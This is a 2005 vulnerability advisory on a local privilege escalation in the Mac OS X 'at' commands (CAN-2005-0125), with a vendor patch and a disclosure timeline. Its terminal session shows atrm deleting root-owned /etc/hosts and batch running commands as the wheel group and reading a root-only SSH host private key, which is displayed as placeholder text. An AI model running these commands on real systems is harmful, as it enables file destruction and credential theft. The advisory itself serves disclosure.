DMA-2005-0127a.txt

`DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'  
Author: Kevin Finisterre  
Vendor: http://www.apple.com/macosx/  
Product: * at commands <= Mac OS X v10.3.7, Mac OS X Server v10.3.7  
  
References: (CAN-2005-0125)  
http://www.digitalmunition.com/DMA[2005-0127a].txt  
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0125  
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html  
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html  
http://docs.info.apple.com/article.html?artnum=300770  
http://www.immunitysec.com/downloads/nukido.pdf  
http://www.immunitysec.com/downloads/nukido.sxw  
  
Description:   
Mac OS X v10.3 Panther offers breakthroughs in innovation and ease of use that won't   
be seen in other operating systems for years, if ever, while its UNIX-based core   
provides rock-solid security on the Internet.  
  
On 1/25/2005 Apple published an advisory for the "at" commands to address a local   
privilege escalation vulnerability. The "at" family of commands did not properly drop   
privileges. This could allow a local user to remove files not owned by them, run programs   
with added privileges, or read the contents of normally unreadable files. The update   
patched the commands at, atrm, batch, atq, and atrun.   
  
The following session outlines the behavior that was reported.   
  
Please note that at, batch, atq, atrm are all disabled by default on Mac OS X. Each   
of these commands depend on the execution of atrun which has been disabled due to power   
management concerns. Those who would like to use these commands, must first re-enable   
/usr/libexec/atrun by removing the leading '#' from the line  
#*/5 * * * * root /usr/libexec/atrun  
in the file /etc/crontab.   
  
'atrm' can be used to delete any file on the system. The atrm vulnerability does not   
depend upon atrun.   
  
CrunkJuice:~ kevinfinisterre$ id  
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre),   
79(appserverusr), 80(admin), 81(appserveradm)  
  
CrunkJuice:~ kevinfinisterre$ rm /etc/hosts  
override rw-r--r-- root/wheel for /etc/hosts? y  
rm: /etc/hosts: Permission denied  
  
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts  
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts  
  
CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts  
  
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts  
ls: /etc/hosts: No such file or directory  
  
'batch' can be used to execute commands as gid=0(wheel) groups=0(wheel), 1(daemon),   
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)   
  
CrunkJuice:/tmp kevinfinisterre$ echo > aa  
/usr/bin/id > /tmp/test  
  
CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0  
Job b0118490c.000 will be executed using /bin/sh  
  
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
  
(wait 5 minutes)  
  
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test  
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),  
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)  
  
'batch' can also be used to read any file on the system.   
  
CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key  
cat: /etc/ssh_host_dsa_key: Permission denied  
  
CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key  
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key  
  
CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key  
Job b011848db.000 will be executed using /bin/sh  
  
CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000  
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000  
  
CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000  
#! /bin/sh  
# mail root 0  
umask 22  
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM  
SHELL=\/bin\/bash; export SHELL  
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION  
OLDPWD=\/var\/at\/jobs; export OLDPWD  
USER=kevinfinisterre; export USER  
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING  
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH  
PWD=\/Users\/kevinfinisterre; export PWD  
SHLVL=1; export SHLVL  
HOME=\/Users\/kevinfinisterre; export HOME  
LOGNAME=kevinfinisterre; export LOGNAME  
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID  
cd /Users/kevinfinisterre  
-----BEGIN DSA PRIVATE KEY-----  
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm  
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek  
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w  
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s  
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm  
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek  
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w  
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s  
ereethamstahenkryption  
-----END DSA PRIVATE KEY-----  
  
Apple has released patches for this vulnerability, please see the   
references above.   
  
For the protection of its customers, Apple does not disclose, discuss,  
or confirm security issues until a full investigation has occurred and  
any necessary patches or releases are available. Apple likes to focus   
response efforts so that they have the greatest impact across  
the product line, because of this they generally will not respond to   
e-mail messages unless further information is needed for a security   
issue.  
  
This is timeline associated with this bug.   
  
12/20/2004 02:22 PM - initial response  
01/03/2005 09:17 PM - followup  
01/12/2005 02:56 PM - ...  
01/13/2005 08:41 PM - ...  
01/19/2005 12:16 AM - confirm credit  
01/20/2005 12:13 PM - immunitysec nukido release  
  
-KF  
  
  
`